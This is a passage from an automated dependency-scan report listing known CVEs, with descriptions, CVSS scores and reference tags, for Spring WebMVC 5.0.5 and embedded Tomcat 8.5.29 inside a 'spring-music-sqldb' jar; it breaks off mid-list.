CVSSv3:
Base Score: MEDIUM (5.300000190734863) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-webmvc:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2022-22968 suppress
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-22970 suppress
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2021-22060 (OSSINDEX) suppress
In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase. CWE-noinfo
CVSSv3:
Base Score: MEDIUM (4.300000190734863) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-webmvc:5.0.5.RELEASE:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: tomcat-embed-core-8.5.29.jarDescription:
Core Tomcat implementation License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/tomcat-embed-core-8.5.29.jar
MD5: 73033b27fd1ce1875d83da62a9fdd7cc
SHA1: 51eac5adde4bc019261b787cb99e5548206908e6
SHA256: 5e821019abc6b19890753c8f6b076893434b264716b7ead980a598fcdfbaafb2
Evidence Type Source Name Value Confidence Vendor central artifactid tomcat-embed-core Highest Vendor central groupid org.apache.tomcat.embed Highest Vendor file name tomcat-embed-core High Vendor jar package name apache Highest Vendor jar package name apache Low Vendor Manifest Implementation-Vendor Apache Software Foundation High Vendor Manifest specification-vendor Apache Software Foundation Low Vendor pom artifactid tomcat-embed-core Low Vendor pom groupid org.apache.tomcat.embed Highest Vendor pom url http://tomcat.apache.org/ Highest Product central artifactid tomcat-embed-core Highest Product file name tomcat-embed-core High Product jar package name apache Highest Product jar package name tomcat Highest Product Manifest Implementation-Title Apache Tomcat High Product Manifest specification-title Apache Tomcat Medium Product pom artifactid tomcat-embed-core Highest Product pom groupid org.apache.tomcat.embed Highest Product pom url http://tomcat.apache.org/ Medium Version central version 8.5.29 Highest Version file version 8.5.29 High Version Manifest Implementation-Version 8.5.29 High Version pom version 8.5.29 Highest
CVE-2018-8014 suppress
The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. CWE-1188 Insecure Default Initialization of Resource
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - VENDOR_ADVISORY security@apache.org - VENDOR_ADVISORY security@apache.org - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-1938 suppress
CISA Known Exploited Vulnerability: Product: Apache Tomcat Name: Apache Tomcat Improper Privilege Management Vulnerability Date Added: 2022-03-03 Description: Apache Tomcat treats Apache JServ Protocol (AJP) connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited. Required Action: Apply updates per vendor instructions. Due Date: 2022-03-17 Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-1938
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. NVD-CWE-Other
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - EXPLOIT,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - ISSUE_TRACKING,MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST security@apache.org - MAILING_LIST,PATCH security@apache.org - MAILING_LIST,PATCH security@apache.org - MAILING_LIST,PATCH security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - RELEASE_NOTES security@apache.org - RELEASE_NOTES security@apache.org - RELEASE_NOTES security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2025-48988 (OSSINDEX) suppress
Allocation of Resources Without Limits or Throttling vulnerability in Apache Tomcat.
This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105.
Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-48988 for details CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: HIGH (8.699999809265137) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.apache.tomcat.embed:tomcat-embed-core:8.5.29:*:*:*:*:*:*:* CVE-2022-25762 suppress
If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause the a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently which could result in data being returned to the wrong use and/or other errors. CWE-404 Improper Resource Shutdown or Release
CVSSv3:
Base Score: HIGH (8.6) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-0232 suppress
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/). CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: HIGH (9.3) Vector: /AV:N/AC:M/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-1336 suppress
An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2018-8034 suppress
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-0199 suppress
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-10072 suppress
The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. CWE-667 Improper Locking
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-17563 suppress
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability. CWE-384 Session Fixation
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11996 suppress
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-13934 suppress
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service. CWE-401 Missing Release of Memory after Effective Lifetime, CWE-476 NULL Pointer Dereference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-13935 suppress
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,RELEASE_NOTES,VENDOR_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-17527 suppress
